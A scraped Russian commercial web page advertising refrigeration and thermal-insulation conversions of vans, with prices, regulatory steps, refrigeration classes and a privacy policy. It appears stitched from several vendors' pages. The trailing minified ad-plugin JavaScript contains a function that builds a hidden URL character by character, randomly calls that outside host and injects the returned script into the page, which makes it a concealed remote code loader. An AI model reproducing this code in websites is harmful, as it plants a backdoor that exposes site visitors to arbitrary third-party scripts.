Переоборудование фургонов в рефрижератор

Переоборудование фургонов в рефрижератор

Бизнес редко отличается статичностью: владельцы пробуют новые способы получения прибыли, развивают смежные направления, а иногда и вовсе меняют специализацию компании. Поэтому переоборудование имеющегося автопарка – частое явление. Отечественные малотоннажные автомобили «Газель» легко поддаются усовершенствованиям. Например, сделать из открытого грузовика тентованный вполне можно своими силами. Но если требуется более серьезная модернизация, например, задумали превратить фургон в рефрижератор «Газель», стоит прибегнуть к помощи специалистов.

Этапы переоборудования

Рефрижератор – это холодильная установка, которая обеспечивает поддержание постоянно низкой температуры внутри фургона. При этом могут быть заданы показатели от -30 до +12 °С, что зависит от специализации бизнеса. Но мало установить охлаждающее оборудование, нужно подготовить и само транспортное средство:

  • Если меняется центр тяжести ТС, то удлиняется база и переставляется силовой каркас.
  • При планируемом увеличении веса фургона требуется усиление рамы и подвески.
  • Обычно наращивается бортовая часть, чтобы улучшить характеристики грузоподъемности.
  • Модернизированный фургон теплоизолируется, иначе рефрижератор будет бесполезен.

Выполнив все работы по переоборудованию автомобиля, необходимо зафиксировать и узаконить изменения в конструкции в государственных инстанциях. В противном случае использование такой машины грозит штрафом. Что его избежать, нужно перерегистрировать «Газель» в МРЭО и поменять техническую документацию. В некоторых случаях также требуется получить лицензию и сертификаты. Когда все бюрократические тонкости будут учтены, автомобиль готов к эксплуатации.

© 2003–2019, Автофристайл
официальный дилер ГАЗ

Переоборудование фургонов в рефрижератор

Переоформление документов для ГИБДД

Уточнить цену по номеру +7 (916) 704 88 14

Ремонт рефрижераторов и отопителей любой сложности

Наш специалист ответит на все вопросы +7 (903) 547 12 61

Утепление фургона Газель Соболь и монтаж рефрижератора

Утепление фургона Форд Транзит (с сохранением боковой двери)

Peugeot Boxer и монтаж холодильника

Установка холодильного оборудования

Остались вопросы? Звоните!

г. Москва, ул. Буракова, 6с8

+7 (916) 704 88 14

+7 (903) 547 12 61

+7 (916) 704 88 14

+7 (903) 547 12 61

Оставьте заявку на расчет стоимости или позвоните +7 (916) 704 88 14

Мы не передаем Вашу персональную

информацию третьим лицам

В ближайшее время мы свяжемся с вами и ответим на ваш вопрос

Мы не передаем Вашу персональную

информацию третьим лицам

Соблюдение Вашей конфиденциальности важно для нас. По этой причине, мы разработали Политику Конфиденциальности, которая описывает, как мы используем и храним Вашу информацию. Пожалуйста, ознакомьтесь с нашими правилами соблюдения конфиденциальности и сообщите нам, если у вас возникнут какие-либо вопросы.

Сбор и использование персональной информации

Под персональной информацией понимаются данные, которые могут быть использованы для идентификации определенного лица либо связи с ним.

От вас может быть запрошено предоставление вашей персональной информации в любой момент, когда вы связываетесь с нами.

Ниже приведены некоторые примеры типов персональной информации, которую мы можем собирать, и как мы можем использовать такую информацию.

Какую персональную информацию мы собираем:

  • Когда вы оставляете заявку на сайте, мы можем собирать различную информацию, включая ваши имя, номер телефона, адрес электронной почты и т.д.

Как мы используем вашу персональную информацию:

  • Собираемая нами персональная информация позволяет нам связываться с вами и сообщать об уникальных предложениях, акциях и других мероприятиях и ближайших событиях.
  • Время от времени, мы можем использовать вашу персональную информацию для отправки важных уведомлений и сообщений.
  • Мы также можем использовать персональную информацию для внутренних целей, таких как проведения аудита, анализа данных и различных исследований в целях улучшения услуг предоставляемых нами и предоставления Вам рекомендаций относительно наших услуг.
  • Если вы принимаете участие в розыгрыше призов, конкурсе или сходном стимулирующем мероприятии, мы можем использовать предоставляемую вами информацию для управления такими программами.

Раскрытие информации третьим лицам

Мы не раскрываем полученную от Вас информацию третьим лицам.

  • В случае если необходимо — в соответствии с законом, судебным порядком, в судебном разбирательстве, и/или на основании публичных запросов или запросов от государственных органов на территории РФ — раскрыть вашу персональную информацию. Мы также можем раскрывать информацию о вас если мы определим, что такое раскрытие необходимо или уместно в целях безопасности, поддержания правопорядка, или иных общественно важных случаях.
  • В случае реорганизации, слияния или продажи мы можем передать собираемую нами персональную информацию соответствующему третьему лицу – правопреемнику.

Защита персональной информации

Мы предпринимаем меры предосторожности — включая административные, технические и физические — для защиты вашей персональной информации от утраты, кражи, и недобросовестного использования, а также от несанкционированного доступа, раскрытия, изменения и уничтожения.

Соблюдение вашей конфиденциальности на уровне компании

Для того чтобы убедиться, что ваша персональная информация находится в безопасности, мы доводим нормы соблюдения конфиденциальности и безопасности до наших сотрудников, и строго следим за исполнением мер соблюдения конфиденциальности.

Изготовление рефрижераторов и установка рефрижераторного оборудования

Наша компания специализируется на установке и техническом обслуживании холодильного и охлаждающего оборудования для автомобилей.

Рефрижераторы не производят, а устанавливают на автомобиль

На нашем предприятии осуществляется установку рефрижераторного оборудования почти на все марки автомобилей с фургоном:

Связаться с нами можно позвонив по специальному многоканальному номеру +7 (495) 771-03-39, или заполнив специальную форму – заявку.

Специалисты нашей компании в короткий срок свяжутся с вами для того, чтобы уяснить все детали установки или проконсультировать по выбору холодильного оборудования.

Какое оборудование мы предлагаем

Мы используем для установки холодильное оборудование только проверенного европейского производителя:

Из чего складывается полноценный рефрижератор

Изготовление рефрижераторов на нашем предприятии производится под строгим контролем, с соблюдая все необходимые нормы и правила.

Фургон-рефрижератор собирается из сэндвич панелей, которые между собой соединяются внешними и внутренними элементами для обрамления, все стыки при этом герметично изолированы и не образовывают тепловых мостов.

Затем в такой фургон устанавливается холодильное оборудование, которое и позволяет поддерживать необходимую температуру внутри фургона.

Стоимость рефрижератора

Стоимость установки рефрижераторного оборудования, зависит от мощности холодильного оборудования и от объема фургона.

Чем выше мощность и больше объем, тем больше вам придется заплатить за рефрижератор. В целом же цена варьируется в пределах 70 000 – 250 000 рублей за холодильное оборудование (с монтажем).

Обращайтесь за квалифицированной помощью именно к нам, и тогда наши специалисты сделают лучшие рефрижераторы для вас. Заполняйте форму на сайте или звоните по телефону. Мы будем рады быть полезными для вас.

Термоизоляция (утепление) фургонов

Звоните: (985)687-07-68

Мы предлагаем Вам программу по теплоизоляции коммерческого транспорта. Теплоизоляция производится на автомобильные фургоны любых моделей. Используя в этой программе термоизоляцию панелями различной толщины, усиление стен, пола и потолка, дополнительное уплотнение дверных порталов, герметизацию наружных и внутренних швов, мы полностью подготавливаем Ваш фургон для перевозки любых продуктов, требующих температурных условий при транспортировке. Данная термоизоляция позволяет перевозить любые продукты от +12ºС до -22ºС, при наружной температуре +/- 30ºС. После сборки панелей, сохраняющих внутренние формы кузова, пространство внутри практически не уменьшается. Внутреннее покрытие легко моется и не впитывает в себя воду, противоскользящий пол, внутреннее освещение все это позволяет максимально долго сохранять великолепное внутреннее состояние Вашего фургона.

Стоимость теплоизоляции с монтажом от 8000 руб. за 1 м³.



Правильно подобранное и установленное на цельнометаллические и изотермические фургоны холодильное оборудование , позволят клиентам перевозить рыбу, мясо, молочную продукцию, фрукты и овощи, кондитерские изделия, цветы, мороженое, медицинские препараты. Все панели и их составляющие полностью сертифицированы всеми контролирующими органами. Сервисное и гарантийное обслуживание производится во всех регионах России.

Так же мы официально представляем и устанавливаем панели (Европейского производства) для термоизоляции цельнометаллических фургонов любых марок автомобилей. Панели производятся вакуумной склейкой армированного стеклопластика с пенополиуретаном различной толщины. Данная термоизоляция позволяет перевозить продукты от +10°С до -22°С при наружной температуре +/-40°С. Доплнительный заднийй портал и боковая дверь полностью исключают «мостики холода». После сборки панелей,сохраняющих внутренние формы кузова, пространство внутри практически не уменьшается. Дополнительно усиленные стены и потолок, позволяют размещать полки и систему подвесов с крюками для перевозки полутуш. Белоснежное внутреннее ламинированное покрытие легко моется и абсолютно не впитывает в себя влагу, дренажная система, дополнительные пороги, противоскользящий пол, внутреннее освещение, все это позволяет максимально долго сохранять великолепное состояние Вашего фургона.

Стоимость теплоизоляции с монтажом от 10000 руб. за 1 м³.

Тeрмоизоляция фургона

Для развозки продуктов с четкими температурными режимами по городу и пригороду идеальным решением может стать термоизоляция фургона ICEBUS.

Сегодня перевозчики товаров (для которых необходимо соблюдать строгие температуры) предпочитают использовать термоизолированные цельнометаллические автомобили с накрышными холодильно-отопительными установками вместо фургонов на шасси. Новые технологии производства термоизоляции фургона делают из серийных цельнометаллических фургонов — полноценный рефрижератор.

Все наши работы производятся в строгом соответствии с европейской технологией термоизоляции цельнометаллических фургонов ICEBUS. Используем весь потенциал современных технологий и материалов.

Последние работы по термоизоляции фургонов

Термоизoляция цельнометаллического фургона

Преимущества перед изотермическим фургоном на шасси:

  • Стоимость. Термоизоляция фургона вдвое дешевле установки изотермического фургона на шасси;
  • Срок производства. Процесс термоизоляции фургона значительно быстрее сроков изготовления, поставки и монтажа фургона;
  • Вес термоизоляции. 112 кг против вес фургона от 1100 кг;
  • Полезная грузоподъемность. У термоизолированного цельнометаллического автомобиля грузоподъемность фактически не меняется. После установки фургона остаточная грузоподъемность шасси снижается как минимум на 1100 кг;
  • Расход топлива. У цельнометаллического кузова за счет аэродинамических качеств расход топлива на 20% ниже, чем у фургона;
  • Удобство в эксплуатации. Цельнометаллический термоизолированный микроавтобус имеет отличную управляемость за счет низкого центра тяжести и маневренность. Низкая погрузочная высота, маневренность и удобство внутригородской эксплуатации. Наличие боковой сдвижной двери-слайдера у цельнометаллического автомобиля дает возможность удобной боковой разгрузки, а сдвижной алгоритм ее работы позволяет открывать и закрывать дверь в стесненных условиях городской логистики.
  • Долговечность. Цельнометаллический кузов оцинкован и окрашен в заводских условиях имеет высокую стойкость к коррозии. Фургоны российского производства теряют свой вид через год, а то и раньше;
  • Выгода. Остаточная стоимость и востребованность цельнометаллического фургона на вторичном рынке гораздо выше;
  • Практичность. Цельнометаллический термоизолированный кузов можно легко адаптировать под другие задачи, демонтировав термоизоляцию. например переоборудовать в грузопассажирский микроавтобус, автомастерскую или лабораторию. Легче соответствовать требованиям рынка и сложившейся экономической ситуации. Наша технология термоизоляции предусматривает демонтаж без повреждения кузова;

Уникальность бесшовной термоизоляции по сравнению с обычными сендвич-панелями:

  • Материалы ICEBUS для термоизоляции фургона обладают низкой теплопроводностью, что помогает быстро создавать и долго удерживать нужную температуру внутри. (Важным моментом является правильный подбор холодильно-отопительного оборудования и качество его монтажа);
  • Термоизоляция ICEBU сохраняет полезный объем фургона. Объем при использовании сендвич-панелей сильно уменьшается. При термоизоляции ICEBUS используются скрытые полости и неполезный объем фургона;
  • Пластичность конструкции термоизоляции ICEBUS позволяет кузову «дышать». Конструкция из сендвич-панелей внутри цельнометаллического кузова лишает его конструктивно заданных степеней свобод, делая избыточно жестким на кручение. При съезде с бордюров или заездах на пандусы кузов цельнометаллического автомобиля испытывает большие нагрузки на сварные швы силовых лонжеронов кузова и на рамку ветрового стекла, что приводит к негативным последствиям в виде лопнувших лобовых стекол и трещинах в лонжеронах;
  • За счет жесткости сендвич-панельного утепления при ДТП сила удара передается на противоположную часть кузова автомобиля, деформируя его. Это приводит к удвоению финансовых затрат на восстановление автомобиля. Термоизоляция ICEBUS деформируется вместе с кузовной панелью и за счет пластичности материалов и пространственного каркаса не передает энергию удара на неповрежденные элементы кузова;
  • В отличии от сендвич-панельного (шовного) утепления термоизолированный фургон по бесшовной технологии ICEBUS позволяет мыть кузов изнутри используя мойку высокого давления. Это значительно упрощает процесс внутренней уборки кузова, выдерживая все самые строгие гигиенические требования, что крайне важно для перевозчиков молочной и рыбной продукции;
  • Спецификация ICEBUS предусматривает возможность локального доступа к кузовным деталям в случае необходимости кузовного ремонта. В случае сендвич-панелей — придется полностью демонтировать, включая холодильно-отопительный агрегат.

IR ИЗОТЕРМИЧЕСКОЕ ТРАНСПОРТНОЕ СРЕДСТВО С УСИЛЕННОЙ ИЗОЛЯЦИЕЙ
для транспортировки скоропортящихся продуктов без холодильного агрегата

FRA ТРАНСПОРТНОЕ СРЕДСТВО-РЕФРИЖЕРАТОР С УСИЛЕННОЙ ИЗОЛЯЦИЕЙ класса A
Транспортное средство для транспортировки пищевых продуктов при температуре +0°C.

FRB ТРАНСПОРТНОЕ СРЕДСТВО-РЕФРИЖЕРАТОР С УСИЛЕННОЙ ИЗОЛЯЦИЕЙ класса В
Транспортное средство для транспортировки пищевых продуктов при температуре -10°C.

FRC ТРАНСПОРТНОЕ СРЕДСТВО-РЕФРИЖЕРАТОР С УСИЛЕННОЙ ИЗОЛЯЦИЕЙ класса С
Транспортное средство для транспортировки пищевых продуктов при температуре -18°C и ниже.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}